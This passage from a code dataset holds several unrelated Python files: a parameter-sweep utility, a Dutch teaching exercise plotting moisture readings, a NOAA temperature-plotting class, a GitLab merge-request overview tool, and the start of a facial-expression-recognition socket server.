apply those key-value pairs that appear in the original.\n proto._update(override if proto._prefix else {k: v for k, v in override.items() if k in org})\n\n if callable(self.__each_fn):\n with Sweep(*self.noot.values()) as sweep:\n self.__each_fn(*self.noot.values())\n for deps in sweep:\n yield {k: v for k, v in itertools.chain(override.items(), deps.items())}\n else:\n yield override\n\n def set_param(self, name, params, prefix=None):\n item = Item(dot_join(prefix, name), params)\n self.stack[-1].append(item)\n\n @property\n @contextmanager\n def product(self) -> ContextManager[None]:\n self.stack.append([])\n try:\n for proto in self.root.values():\n prefix = proto._prefix\n proto._add_hooks(lambda _, *args, p=prefix: self.set_param(*args, prefix=p))\n yield self\n finally:\n for proto in self.root.values():\n proto._pop_hooks()\n\n frame = self.stack.pop(-1)\n result = itertools.product(*key_items(frame))\n self.set_param(None, result)\n\n @property\n @contextmanager\n def zip(self) -> ContextManager[T]:\n self.stack.append([])\n try:\n for proto in self.root.values():\n prefix = proto._prefix\n proto._add_hooks(lambda _, *args, p=prefix: self.set_param(*args, prefix=p))\n yield self\n finally:\n for proto in self.root.values():\n proto._pop_hooks()\n\n frame = self.stack.pop(-1)\n result = list(zip(*key_items(frame)))\n self.set_param(None, result)\n\n @property\n @contextmanager\n def set(self) -> ContextManager[T]:\n try:\n yield self.__enter__()\n finally:\n self.__exit__()\n\n @property\n @contextmanager\n def chain(self) -> ContextManager[T]:\n self.stack.append([])\n try:\n for proto in self.root.values():\n prefix = proto._prefix\n proto._add_hooks(lambda _, *args, p=prefix: self.set_param(*args, prefix=p))\n yield self\n finally:\n for proto in self.root.values():\n proto._pop_hooks()\n\n frame = self.stack.pop(-1)\n result = itertools.chain(*(value for k, value in frame))\n self.set_param(None, result)\n\n def save(self, filename=\"sweep.jsonl\", overwrite=True, verbose=True):\n import json\n from termcolor import colored as c\n # todo: connect to ml-logger to setup managed sweep\n with open(filename, 'w' if overwrite else 'a+') as f:\n for item in self.list:\n f.write(json.dumps(item) + '\\n')\n\n if verbose:\n import os\n from urllib import parse\n\n print(\n c(\"saved\", \"blue\"),\n c(len(self.list), \"green\"),\n c(\"items to\", \"blue\"),\n filename,\n \".\",\n # this is to show file path in console.\n \"file://\" + parse.quote(os.path.realpath(filename))\n )\n\n @staticmethod\n def log(deps, filename):\n \"\"\"append deps object to a JSONL log file, used as a helper function\"\"\"\n import json\n with open(filename, 'a+') as f:\n f.write(json.dumps(deps) + '\\n')\n\n @staticmethod\n def read(filename):\n \"\"\"Read JSONL log files, used as a helper function\"\"\"\n import json\n sweep = []\n with open(filename, 'r') as f:\n line = f.readline().strip()\n while line: # need to handle end of line\n if not line.startswith(\"//\"):\n sweep.append(json.loads(line.strip()))\n line = f.readline().strip()\n return sweep\n\n file = None\n\n def load(self, file=\"sweep.jsonl\", strict=True, silent=False):\n \"\"\"\n Loading sweep state from a jsonl file:\n\n Note: **Important Caveat** When multiple prefix-free ParamsProto objects are present,\n We sweep through all of the proto objects and sets the attribute to the first\n proto with the correct key. This first-attr approach works because the ParamsProto\n object also generates argparse parameters, which means repetitive arguments are\n not possible.\n ~\n However this would fail in cases where attributes are dynamically added to an\n argument object. The `sweep.jsonl` file loses this type of information, therefore\n there is no way to recover this type of attributes. So the user should try to\n either use PrefixProto, or explicitly define the attributes.\n\n Usage Pattern 1: Loading from a file\n\n sweep = Sweep(Args, RUN).load('sweep.jsonl')\n for i, deps in enumerate(sweep):\n assert RUN.job_id == i + 1, \"the job_id in that sweep.json should be 1-based.\"\n\n Usage Pattern 2: Leading from a sweep list object or a pandas DataFrame\n\n sweep_list = Sweep.read(sweep.jsonl)\n sweep = Sweep(Args, RUN).load(sweep_list)\n for i, deps in enumerate(sweep):\n assert RUN.job_id == i + 1, \"the job_id in that sweep.json should be 1-based.\"\n\n \"\"\"\n import pandas as pd\n from termcolor import colored\n\n self.file = file\n\n if isinstance(file, str):\n file = self.read(file)\n if isinstance(file, list):\n df = pd.DataFrame(file)\n elif isinstance(file, pd.DataFrame):\n df = file\n else:\n raise TypeError(f\"{type(file)} is not supported\")\n\n with self.zip:\n for full_key in df:\n prefix, *keys = full_key.split('.')\n if prefix in self.root:\n proto = self.root[prefix]\n if not hasattr(proto, keys[0]):\n if strict:\n raise KeyError(f'{proto} does not contain the key \"{prefix}.{keys[0]}\"')\n if not silent:\n print(colored(f'{proto} does not contain the key \"', \"red\") +\n colored(f'{full_key}', \"green\") +\n colored(f'\" ', \"red\"))\n\n setattr(proto, '.'.join(keys), df[full_key].values.tolist())\n else:\n for k, proto in self.root.items():\n if isinstance(k, str):\n continue\n if hasattr(proto, prefix):\n setattr(proto, full_key, df[full_key].values.tolist())\n break\n else:\n if strict:\n raise KeyError(f'The key \"{full_key}\" does not appear in any of the Arguments')\n if not silent:\n print(\n colored(f'The key \"', \"red\") +\n colored(f'{full_key}', \"green\") +\n colored(f'\" ', \"red\") +\n colored(f'does not appear in any of the Arguments', \"red\")\n )\n return self\n","repo_name":"geyang/params-proto","sub_path":"params_proto/hyper.py","file_name":"hyper.py","file_ext":"py","file_size_in_byte":13088,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"40409824149","text":"from datetime import datetime\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom moistureReadings import moisture_levels1, moisture_levels2, moisture_levels3\n\n\"\"\"\nOPDRACHT:\n\nJe buurman heeft geen groene vingers maar houdt ontzettend van mooie tuinen. Zijn planten gaan altijd dood omdat hij\nniet weet hoeveel en wanneer hij de planten water moet geven. Daarom heeft hij besloten om een systeem aan te\nschaffen die de vochtlevels in zijn tuin meten zodat hij beter weet waar en hoeveel hij water met geven aan de tuin.\nhet probleem is dat dit systeem alleen nummers geeft en de buurman snapt niet goed wat hij hiermee aan moet.\nomdat jij een goede buur bent help jij de buurman.\n\nje krijgt de waarde van de metingen al deze heten moisture_levels1,moisture_levels2, moisture_levels3\nen staan in het andere python bestand, NIET SPIEKEN.\n\nTIP je zou de volgende functies van numpy en mathplotlib handig kunnen vinden.\n\n- plt.imshow\n- plt.colorbar\n- plt.title\n- plt.grid\n- plt.xlim\n- plt.ylim\n- plt.show\n- plt.scatter\n\nTAAK 1 maak de metingen visueel met een functie makGraph.\nTAAK 2 haal de locatie van de droge plekken op en print deze met een functie get_locations.\nBONUS taak 3 zet cirkels op de kaart om de droge plekken.\nBonus TAAK 4 maak een klasse van moisture reading met de variabele reading, date.\nen de functies makegraph en getlocation DEZE IS ALLEEN TE MAKEN ALS DE GROEP AL KLASSE HEEFT GEHAD!!\n\nStappenplan:\n1. Importeer de nodige modules, in dit geval matplotlib.pyplot en numpy\n\n\"\"\"\n\n\nclass MoistureReading:\n def __init__(self, reading, date):\n self.reading = reading\n self.date = date\n self.locations = self.get_locations()\n\n def makeGraph(self):\n plt.imshow(self.reading, cmap='viridis')\n plt.colorbar()\n plt.title(f'Moisture Levels in the Garden ({self.date})', fontweight=\"bold\")\n plt.grid(color='black', linestyle='--', linewidth=0.5)\n plt.xlim(0, 20)\n plt.ylim(0, 20)\n for loc in self.locations:\n plt.scatter(loc[1], loc[0], s=400, facecolors='none', edgecolors='r')\n plt.show()\n\n def get_locations(self):\n locations = np.argwhere(self.reading < 10)\n return np.array(locations)\n\n\nreading1 = MoistureReading(moisture_levels1, datetime(2023, 1, 1))\nreading2 = MoistureReading(moisture_levels2, datetime(2023, 1, 2))\nreading3 = MoistureReading(moisture_levels3, datetime(2023, 1, 3))\n\nreading1.makeGraph()\nprint(reading1.locations)\n\nreading2.makeGraph()\nprint(reading2.locations)\n\nreading3.makeGraph()\nprint(reading3.locations)","repo_name":"Richard-H12/Learning","sub_path":"les6_uitwerkingen.py","file_name":"les6_uitwerkingen.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38243128686","text":"#!/bin/python37\n\n##\n## By Julia Engdahl 09/08/2020\n## Modified by Elim Thompson 09/09/2020\n##\n## This script is only a class and should not be called by itself. To use\n## this library, check out plot_data.py\n##\n## Julia's original script ddp_plots.py:\n## This script contains functions to generate water level, temperature, wind,\n## pressure plots and to concatenate them into GIF. \n## * water level: time-series with prediction and observation\n## * temperature: both water and air temp as time-series and thermometers\n## * wind : polar plot (i.e. no time-series)\n## * pressure : time-series with a barometer\n##\n## Elim's modification:\n## * Turned ddp_plots.py into a product and their children classes\n## * Added ability to do both time-series + object and object alone\n##############################################################################\n\n###############################################\n## Import libraries\n###############################################\nimport requests, pytz, glob, os, sys\nimport numpy as np\nimport pandas as pd\nimport datetime as dt\nfrom . import product\n\nimport matplotlib\nmatplotlib.use ('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.colors import LightSource\nplt.rc ('text', usetex=False)\nplt.rc ('font', family='sans-serif')\nplt.rc ('font', serif='Computer Modern Roman')\n\n###############################################\n## Define constants\n###############################################\n## Monitor dpi\nDPI = product.DPI\n\n## Number of continuous bad data to trigger no-plot-shown\nN_HOURS_NULL_DATA = product.N_HOURS_NULL_DATA\n\n## Time format for display\nTIME_FORMAT = '%m/%d/%Y %I:%M %p'\nCURRENT_TIME_LABEL = 'Current Time'\n\n## For plotting style\nXTICKLABEL_TIME_FORMAT = product.XTICKLABEL_TIME_FORMAT\nXTICKLABEL_HOURS = product.XTICKLABEL_HOURS\nN_YTICKS = product.N_YTICKS\n\n## For temperature\nTEMP_BULB_RADIUS = 6\nTEMP_TUBE_SCALE = 60\nTEMP_TUBE_HEIGHT = TEMP_TUBE_SCALE + 3 # Tube is slightly taller\n# Position of air and water thermometer on time-series plot\n# [x-coordinate (lower left), y-coordinate (lower left), width, height]\nTEMP_AIR_THERMO_POS = [0.0, 0.0, 0.4, 1]\nTEMP_WATER_THERMO_POS = [0.5, 0.0, 0.4, 1]\nTEMP_SCALE_PAD = 20\n\n###############################################\n## Define short lambda functions\n###############################################\nconvert_defF_to_defC = lambda degF: (degF - 32) * 5/9\n\n###############################################\n## Define temperature child class\n###############################################\nclass temperature (product.product):\n\n def __init__ (self):\n\n ''' To initialize a temperature product instance '''\n\n super().__init__('temperature')\n\n ## Thermometer parameters\n self._tube_scale = TEMP_TUBE_SCALE\n self._tube_height = TEMP_TUBE_HEIGHT\n self._bulb_radius = TEMP_BULB_RADIUS\n self._scale_pad = TEMP_SCALE_PAD\n\n # For time-series plot specifically\n self._air_thermo_pos = TEMP_AIR_THERMO_POS\n self._water_thermo_pos = TEMP_WATER_THERMO_POS\n\n def __repr__ (self):\n pass\n\n # +------------------------------------------------------------\n # | Getters & setters\n # +------------------------------------------------------------ \n @property\n def latest_obs (self): return self.latest_air_temp\n\n @property\n def latest_obs_time (self):\n if self._latest_data_df is None: return None\n not_na = ~self._latest_data_df.air.isna()\n return self._latest_data_df.air.index[not_na][-1]\n\n @property\n def latest_air_temp (self):\n if self._latest_data_df is None: return None\n not_na = ~self._latest_data_df.air.isna()\n return self._latest_data_df.air.values[not_na][-1]\n\n @property\n def latest_water_temp (self):\n if self._latest_data_df is None: return None\n not_na = ~self._latest_data_df.water.isna()\n return self._latest_data_df.water.values[not_na][-1]\n\n @property\n def has_all_nan (self):\n ## If dataframe is None -> no past data\n if self._latest_data_df is None: return False\n ## Slice out observed data from N hours before obs time\n begin_time = self.latest_obs_time - pd.offsets.Hour (N_HOURS_NULL_DATA)\n end_time = self.latest_obs_time\n observed = self._latest_data_df.loc[begin_time:end_time,].air_temp\n ## Check if all observed data in this time window is invalid\n return observed.isna().all()\n\n @property \n def min_temp (self):\n if self._latest_data_df is None: return None\n return self._latest_data_df.loc[:, ['air', 'water']].min().min()\n\n @property \n def max_temp (self):\n if self._latest_data_df is None: return None\n return self._latest_data_df.loc[:, ['air', 'water']].max().max()\n\n @property\n def tube_scale (self): return self._tube_scale\n @tube_scale.setter\n def tube_scale (self, number):\n ## Make sure input is a number\n self._check_is_number (number)\n ## Make sure this number is 0 or positive\n if number < 0:\n raise IOError ('Tube Scale must be >= 0.')\n self._tube_scale = number\n\n @property\n def tube_height (self): return self._tube_height\n @tube_height.setter\n def tube_height (self, number):\n ## Make sure input is a number\n self._check_is_number (number)\n ## Make sure this number is 0 or positive\n if number < 0:\n raise IOError ('Tube Height must be >= 0.')\n self._tube_height = number\n\n @property\n def bulb_radius (self): return self._bulb_radius\n @bulb_radius.setter\n def bulb_radius (self, number):\n ## Make sure input is a number\n self._check_is_number (number)\n ## Make sure this number is 0 or positive\n if number < 0:\n raise IOError ('Bulb radius must be >= 0.')\n self._bulb_radius = number\n\n @property\n def scale_pad (self): return self._scale_pad\n @scale_pad.setter\n def scale_pad (self, number):\n ## Make sure input is a number\n self._check_is_number (number)\n ## Make sure this number is 0 or positive\n if number < 0:\n raise IOError ('Padding between tick and scale must be >= 0.')\n self._scale_pad = number\n\n @property\n def air_thermo_pos (self): return self._air_thermo_pos\n @air_thermo_pos.setter\n def air_thermo_pos (self, array):\n ## Make sure input is a number array with 4 values\n self._check_is_array (array, length=4)\n ## Make sure the elements are numbers\n for elem in array: self._check_is_number (elem) \n self._air_thermo_pos = array\n\n @property\n def water_thermo_pos (self): return self._water_thermo_pos\n @water_thermo_pos.setter\n def water_thermo_pos (self, array):\n ## Make sure input is a number array with 4 values\n self._check_is_array (array, length=4)\n ## Make sure the elements are numbers\n for elem in array: self._check_is_number (elem) \n self._water_thermo_pos = array\n\n # +------------------------------------------------------------\n # | Collect & handle temp data\n # +------------------------------------------------------------\n def _normalize_temperature (self, temp):\n\n tmin = self.min_temp - 5\n tmax = self.max_temp + 5\n return (temp - tmin) / (tmax - tmin) * self._tube_scale\n\n def _load_data (self):\n\n ## Make sure \"now\" time is set\n if self._now is None:\n raise IOError (\"Please define now time before loading data.\")\n\n ## Get 6-min air temp observation time-series: v, f\n air_df = self._load_latest(product_name = 'air_temperature')\n air_df = air_df.drop(axis=1, columns=['f'])\n air_df.columns = ['air']\n\n ## Get 6-min water temp observation time-series: v, f\n water_df = self._load_latest(product_name = 'water_temperature')\n water_df = water_df.drop(axis=1, columns=['f'])\n water_df.columns = ['water']\n\n ## Merge two into one\n obs_df = pd.merge (air_df, water_df, right_index=True, left_index=True, how='outer')\n\n ## Go through each column to convert them to float type\n obs_df['air'] = obs_df.air.astype (float)\n obs_df['water'] = obs_df.water.astype (float)\n self._latest_data_df = obs_df\n\n ## Convert temperature to tube height\n obs_df['air_height'] = self._normalize_temperature (obs_df.air)\n obs_df['water_height'] = self._normalize_temperature (obs_df.water)\n\n ## Add in extra hours with nan temp for time-series plots\n end_date = self.now + pd.offsets.Hour (self._hours_pad[1])\n obs_df.loc[end_date.strftime('%Y-%m-%d %H:%M:%S')] = \\\n pd.Series ([np.NaN]*len (obs_df.columns), obs_df.columns)\n obs_df = obs_df.asfreq ('6min')\n\n ## Store it as internal variable\n self._latest_data_df = obs_df\n\n # +------------------------------------------------------------\n # | Plot functions\n # +------------------------------------------------------------\n def _plot_obs_time_series (self, axis, df, dot_time, ylimits,\n yticks, yticklabels, ylabel):\n\n # Define data to be plotted up to dot-time\n valid_points = np.logical_or (~df.air.isna(), ~df.water.isna())\n before_dot_obs = df[np.logical_and (df.index <= dot_time, valid_points)]\n latest_obs = before_dot_obs.tail(1)\n\n # 1. Plot air temp observation up to dot time\n axis.plot(before_dot_obs.index, before_dot_obs.air, c='red',\n label='Air temperature', linewidth=self._linewidth)\n # Add red dot for air temp \n axis.scatter (latest_obs.index[0], latest_obs['air'][0], c='red',\n s=self._markersize, alpha=0.7)\n\n # 2. Plot water temp observation up to dot time\n axis.plot(before_dot_obs.index, before_dot_obs.water, c='blue',\n label='Water temperature', linewidth=self._linewidth)\n # Add blue dot for water temp \n axis.scatter (latest_obs.index[0], latest_obs['water'][0], c='blue',\n s=self._markersize, alpha=0.7)\n\n # 3. Add vertical line for recent data time in LST/LDT\n axis.axvline (self._now.strftime ('%Y-%m-%d %H:%M'), color='green',\n label=CURRENT_TIME_LABEL, linewidth=self._linewidth)\n\n # 4. Format x-axis based on hours-pad\n axis.set_xlim(df.index[0], df.index[-1])\n xticks = df.index [np.logical_and (df.index.hour.isin (XTICKLABEL_HOURS), df.index.minute==0)] \n axis.set_xticks (xticks)\n xticklabels = [x.strftime (XTICKLABEL_TIME_FORMAT) for x in xticks]\n axis.set_xticklabels (xticklabels, rotation=25, fontsize=self._fontsize)\n axis.set_xlabel('Date time', fontsize=self._fontsize, labelpad = 23)\n \n # 5. Format y-axis\n axis.set_ylim (ylimits)\n axis.set_yticks (yticks)\n yticklabels = ['{0:.1f}'.format (y) for y in yticklabels]\n axis.set_yticklabels (yticklabels, fontsize=self._fontsize)\n axis.set_ylabel (ylabel, fontsize=self._fontsize, labelpad = 23)\n \n # 6. Add grid lines\n for ytick in axis.get_yticks():\n axis.axhline (y=ytick, color='gray', alpha=0.7, linestyle=':', linewidth=1.0)\n for xtick in axis.get_xticks():\n axis.axvline (x=xtick, color='gray', alpha=0.7, linestyle=':', linewidth=1.0)\n\n def _create_a_thermometer_on_main_axis (self, axis, temp_height, yticks, \n isAir=False):\n \n ## Define constants based on air or water thermometers\n color = '#f94f60' if isAir else '#007bae'\n rect = self._air_thermo_pos if isAir else self._water_thermo_pos\n\n ## Create a new matplotlib figure and map the coordinate with main axis\n fig = plt.gcf()\n box = axis.get_position()\n width, height = box.width, box.height\n inax_position = axis.transAxes.transform(rect[0:2])\n transFigure = fig.transFigure.inverted()\n infig_position = transFigure.transform(inax_position) \n\n ## Remove rectangle grid\n axis.axis ('off')\n\n ## Create a sub-axis in the rectangle defined\n x = infig_position[0]\n y = infig_position[1]\n width *= rect[2]\n height *= rect[3]\n subax = fig.add_axes([x,y,width,height])\n\n ## Create a thermometer in the sub-axis\n self._create_a_thermometer (subax, temp_height, yticks, color, isAir=isAir)\n \n def _create_a_thermometer (self, axis, height, yticks, color, isAir=False):\n\n ## Format x & y axes\n # 1. x-axis centered at (0,0) i.e. center of bulb with a diameter of 6\n axis.set_xlim (-10,10)\n # 2. y-axis ends at tube height\n axis.set_ylim (-10, self._tube_height)\n # Normalize input yticks to be within tube scale\n normalized_yticks = [(y-min(yticks)) / (max(yticks)-min(yticks))*self._tube_scale\n for y in yticks]\n axis.set_yticks (normalized_yticks)\n \n ## Format spines \n axis.spines['top'].set_visible(False)\n axis.spines['right'].set_visible(False)\n axis.xaxis.set_ticks([])\n axis.spines['bottom'].set_color('none') \n\n ## Show scale only if air thermometer\n if isAir: \n # Show left spine\n axis.yaxis.set_ticks_position('left')\n # Define y ticklabdels to be the same as main plot (instead of tube scale)\n ylabels = ['{0:.0f}$^\\circ$F'.format (y) for y in yticks]\n axis.set_yticklabels (ylabels, fontsize=self._fontsize-7)\n # Format the spine line and ticks\n axis.spines['left'].set_linewidth(3)\n axis.tick_params(axis='y', width=2, length=10, pad=self._scale_pad)\n else:\n # Do not show left spine\n axis.yaxis.set_ticks([])\n axis.spines['left'].set_color('none') \n \n ## Draw the tube as a patch, with round corners, aligned with bulb's center\n tube_width = self._bulb_radius + 1\n tube_loc = (-1 *tube_width / 2, 0)\n tube = matplotlib.patches.FancyBboxPatch (tube_loc, tube_width, self._tube_height,\n linewidth=3, edgecolor=color, facecolor='none',\n boxstyle=\"round,pad=0,rounding_size=3.5\",\n capstyle='round', joinstyle=\"round\")\n ## Anchor this tube patch to this thermometer subplot\n axis.add_patch (tube)\n\n ## Draw the bulb as a patch centered at (0, 0) \n circle = plt.Circle ((0, 0), radius=self._bulb_radius, color=color)\n axis.add_patch (circle)\n \n ## Write temp type in the bulb with shadow\n tempType = 'Air' if isAir else 'Water'\n axis.annotate (tempType, xy=(0.1, -0.2), fontsize=self._fontsize-3,\n ha=\"center\", va=\"center\", color='#E8E8E8')\n axis.annotate (tempType, xy=(0, 0), fontsize=self._fontsize-3,\n ha=\"center\", va=\"center\", color='black')\n \n ## Fill in data in tube with data at dot-time\n if np.isfinite (height):\n # Create a new tube up to the current temperature\n tube = matplotlib.patches.FancyBboxPatch (tube_loc, tube_width, height,\n linewidth=3, facecolor=color, edgecolor=color)\n axis.add_patch (tube)\n\n return axis\n\n def _generate_one_plot (self, dot_time, doMetric=False):\n\n ## Make sure df time is set\n df = self._latest_data_df\n if df is None: raise IOError (\"Please load data before plotting.\") \n \n ## Define the unit - either degF or defC\n yunit = '$^\\circ$C' if doMetric else '$^\\circ$F'\n \n ## Create a huuuge canvas with 2 subplots.\n fig = plt.figure(figsize=self.fig_size, dpi=DPI)\n gs = gridspec.GridSpec (ncols=2, nrows=1, width_ratios=[3, 1], bottom=0.15, top=0.85)\n gs.update (top=0.8)\n\n ## Left: Time-series plot\n axis = fig.add_subplot(gs[0])\n ylimits = [self.min_temp-5, self.max_temp+5]\n yticks = np.linspace (ylimits[0], ylimits[1], N_YTICKS)\n yticklabels = convert_defF_to_defC (yticks) if doMetric else yticks \n ylabel = 'Temprature ({0})'.format (yunit)\n self._plot_obs_time_series (axis, df, dot_time, ylimits, yticks, yticklabels, ylabel)\n lgd = axis.legend (bbox_to_anchor=(0, 1, 1, 0), loc='lower right', fontsize=self._fontsize)\n axis.set_title('Temperature', fontsize=self._fontsize*3, loc='left', pad=37)\n\n ## Right: Thermometers\n subgs = gs[1].subgridspec (2, 1, height_ratios=[1, 4])\n axis = fig.add_subplot(subgs[1])\n at_dot = df[df.index == dot_time].tail (1)\n air_height = at_dot.air_height.values[0]\n self._create_a_thermometer_on_main_axis (axis, air_height, yticks, isAir=True)\n water_height = at_dot.water_height.values[0]\n self._create_a_thermometer_on_main_axis (axis, water_height, yticks, isAir=False)\n\n ## Format title / layout\n plt.savefig(self._plot_path + '/' + dot_time.strftime ('%Y%m%d%H%M') + '.jpg',\n bbox_extra_artists=(lgd,), dpi=DPI)\n \n ## Properly close the window for the next plot\n plt.close ('all')\n\n def create_gif (self):\n\n ## Make sure \"now\" time is set\n if self._now is None:\n raise IOError (\"Please define now time before creating gif.\")\n \n ## Remove everything in the plot path\n if os.path.exists (self.plot_path):\n all_files = glob.glob (self.plot_path + '/*.jpg')\n for afile in all_files: os.remove (afile)\n\n ## Gather data\n self._load_data()\n\n ## Generate each time step until the last observation point\n ## Toggle from degF to degC and back every N frames\n doMetric = True # Start with knots\n end_time = self.latest_obs_time\n timestamps = list (self._latest_data_df.iloc[::10, :].index) + [end_time]\n for index, dot_time in enumerate (sorted (timestamps)):\n # If there is no more valid observation points, exit the loop\n if dot_time > end_time: break\n # Toggle units\n if index % self._toggle_units_freq == 0: doMetric = not doMetric\n # Generate the plot for this time stamp\n self._generate_one_plot (dot_time, doMetric=doMetric)\n\n ## Create gif\n self._make_gif()\n","repo_name":"NOAA-CO-OPS/digital-display","sub_path":"webapp/plotter/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":18704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73878695505","text":"import traceback\nfrom typing import List\n\nfrom gitlab import Gitlab, GitlabHttpError\nfrom gitlab.v4.objects import ProjectMergeRequest\nfrom requests import Timeout\n\nfrom .config import GitlabMrsConfig, GitlabMrsConstants\nfrom ..common.util import abbreviate_string, time_ago, zulu_timestamp_string_to_datetime\nfrom ..pull_requests import PullRequestStatus, PullRequest, PullRequestsOverview, PullRequestException\n\n\ndef get_merge_requests_to_review(_author_id, _mrs):\n mrs_and_overall_status = list()\n\n for mr in _mrs:\n if mr.author[\"id\"] != _author_id:\n approvals = list(\n filter(lambda approval: approval[\"user\"][\"id\"] == _author_id, mr.approvals.get().approved_by))\n\n if len(approvals) != 0 and not GitlabMrsConfig.OMIT_REVIEWED_AND_APPROVED:\n mrs_and_overall_status.append(get_overall_status(mr, _author_id))\n else:\n mrs_and_overall_status.append(get_overall_status(mr, _author_id))\n\n return mrs_and_overall_status\n\n\ndef get_authored_merge_requests(_author_id, _mrs):\n mrs_and_overall_status = list()\n\n for mr in _mrs:\n if mr.author[\"id\"] == _author_id:\n mrs_and_overall_status.append(get_overall_status(mr, _author_id))\n\n return mrs_and_overall_status\n\n\ndef get_overall_status(_mr, _author_id) -> (ProjectMergeRequest, PullRequestStatus):\n has_unresolved_threads = mr_has_unresolved_threads(_mr, _author_id)\n approved = mr_is_approved(_mr, _author_id)\n\n if has_unresolved_threads and approved:\n return _mr, PullRequestStatus.APPROVED_WITH_SUGGESTIONS\n elif has_unresolved_threads:\n return _mr, PullRequestStatus.NEEDS_WORK\n elif approved:\n return _mr, PullRequestStatus.APPROVED\n else:\n return _mr, PullRequestStatus.UNAPPROVED\n\n\ndef mr_has_unresolved_threads(_mr, _author_id) -> bool:\n # Get the `resolved` attribute, and default to true if the attribute does not exist,\n # that way, we only get resolvable comments\n # We only want to keep the unresolved comments that are not yet resolved and are resolvable,\n # hence, we negate the attribute\n\n notes = _mr.notes.list()\n\n if _mr.author[\"id\"] == _author_id:\n unresolved_threads_by_others = list(\n filter(lambda note: not getattr(note, 'resolved', True) and note.author[\"id\"] != _author_id,\n notes))\n return len(unresolved_threads_by_others) > 0\n else:\n unresolved_threads_by_me = list(\n filter(lambda note: not getattr(note, 'resolved', True) and note.author[\"id\"] == _author_id,\n notes))\n return len(unresolved_threads_by_me) > 0\n\n\ndef mr_is_approved(_mr, _author_id) -> bool:\n approvals = _mr.approvals.get().approved_by\n\n if _mr.author[\"id\"] == _author_id:\n others_approvals = list(filter(lambda approval: approval[\"user\"][\"id\"] != _author_id, approvals))\n return len(others_approvals) > 0\n else:\n my_approval = list(filter(lambda approval: approval[\"user\"][\"id\"] == _author_id, approvals))\n return len(my_approval) == 1\n\n\ndef extract_pull_request_data(_raw_merge_requests) -> List[PullRequest]:\n merge_requests: List[PullRequest] = list()\n\n for mr, overall_status in _raw_merge_requests:\n pr_activity = zulu_timestamp_string_to_datetime(mr.updated_at)\n\n merge_requests.append(PullRequest(\n id=str(mr.iid),\n title=abbreviate_string(mr.title, GitlabMrsConfig.ABBREVIATION_CHARACTERS),\n slug=mr.references[\"full\"].replace(mr.references[\"short\"], \"\"),\n from_ref=mr.source_branch,\n to_ref=mr.target_branch,\n overall_status=overall_status,\n activity=pr_activity,\n time_ago=time_ago(pr_activity),\n all_prs_href=mr.web_url.replace(f\"/{mr.iid}\", \"\"),\n href=mr.web_url\n ))\n\n return merge_requests\n\n\ndef group_mrs(_gl):\n group = _gl.groups.get(GitlabMrsConfig.GROUP_NAME)\n\n all_open_mrs = group.mergerequests.list(state=\"opened\", all=True, wip=\"no\") if GitlabMrsConfig.OMIT_DRAFT else group.mergerequests.list(state=\"opened\", all=True)\n\n # Ensure we only keep MRs that have none of the labels in the exclusions list\n mrs = list(\n filter(\n lambda mr: len(GitlabMrsConfig.EXCLUDE_MRS_WITH_LABELS.intersection(mr.labels)) == 0, all_open_mrs\n )\n )\n\n projects_and_mrs = list()\n projects = dict()\n for mr in mrs:\n if mr.project_id in projects:\n project = projects[mr.project_id]\n else:\n project = _gl.projects.get(mr.project_id, lazy=True)\n projects[mr.project_id] = project\n\n projects_and_mrs.append(project.mergerequests.get(mr.iid))\n\n return projects_and_mrs\n\n\ndef get_merge_request_overview() -> PullRequestsOverview:\n _prs_to_review: List[PullRequest] = []\n _prs_authored_with_work: List[PullRequest] = []\n _exception = None\n\n _gl = Gitlab(url=GitlabMrsConfig.GITLAB_HOST, private_token=GitlabMrsConfig.PRIVATE_TOKEN)\n _gl.auth()\n _author_id = _gl.user.id\n\n mrs = group_mrs(_gl)\n\n try:\n _prs_to_review: List[PullRequest] = extract_pull_request_data(\n get_merge_requests_to_review(_author_id, mrs)\n )\n _prs_authored_with_work: List[PullRequest] = extract_pull_request_data(\n get_authored_merge_requests(_author_id, mrs)\n )\n except Timeout as e:\n _exception = PullRequestException(GitlabMrsConstants.MODULE, GitlabMrsConstants.TIMEOUT_MESSAGE, e,\n traceback.format_exc())\n except GitlabHttpError as e:\n _exception = PullRequestException(GitlabMrsConstants.MODULE, GitlabMrsConstants.CONNECTION_MESSAGE, e,\n traceback.format_exc())\n except Exception as e:\n _exception = PullRequestException(GitlabMrsConstants.MODULE, GitlabMrsConstants.UNKNOWN_MESSAGE, e,\n traceback.format_exc())\n\n return PullRequestsOverview.create(_prs_to_review, _prs_authored_with_work, _exception)\n","repo_name":"trietsch/xbar","sub_path":"src/python/gitlab_mrs/gitlab_mrs.py","file_name":"gitlab_mrs.py","file_ext":"py","file_size_in_byte":6103,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"8493501246","text":"#!/usr/bin/env python\n# -*-coding:utf-8-*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport cv2\nimport tensorflow as tf\nimport numpy as np\nimport os\nfrom socket import *\nfrom select import *\nimport sys\nfrom time import ctime\n\"\"\" -------------------------------------------------------------\n### Facial Expression Recognition Server\n### ------------------------------------------------------------- \"\"\"\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer('test_size', 1, 'test_batch_size')\nflags.DEFINE_integer('NoC', 4, 'the number of classes')\nflags.DEFINE_string('root', '/media/austin/D_drive/Embedded/', 'root directory for training')\nflags.DEFINE_string('ckpt', 'model/vgg_SGD/', 'ckpt directory')\n\nsvPath = '/media/austin/D_drive/Embedded/Test/'\nHOST = ''\nPORT = 9055\nBUFSIZE = 1024\nADDR = (HOST, PORT)\n\n# make socket object\nserverSocket = socket(AF_INET, SOCK_STREAM)\n\n# bind server information\nserverSocket.bind(ADDR)\n\n# waiting request\nserverSocket.listen(10)\nconnection_list = [serverSocket]\n\ndef hom(img):\n rows = img.shape[0]\n cols = img.shape[1]\n\n imgLog = np.log1p(np.array(img, dtype=\"float\") / 255)\n\n M = 